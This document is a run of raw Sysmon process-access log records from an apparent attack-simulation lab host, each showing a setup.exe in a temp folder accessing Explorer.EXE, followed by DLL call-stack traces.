13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3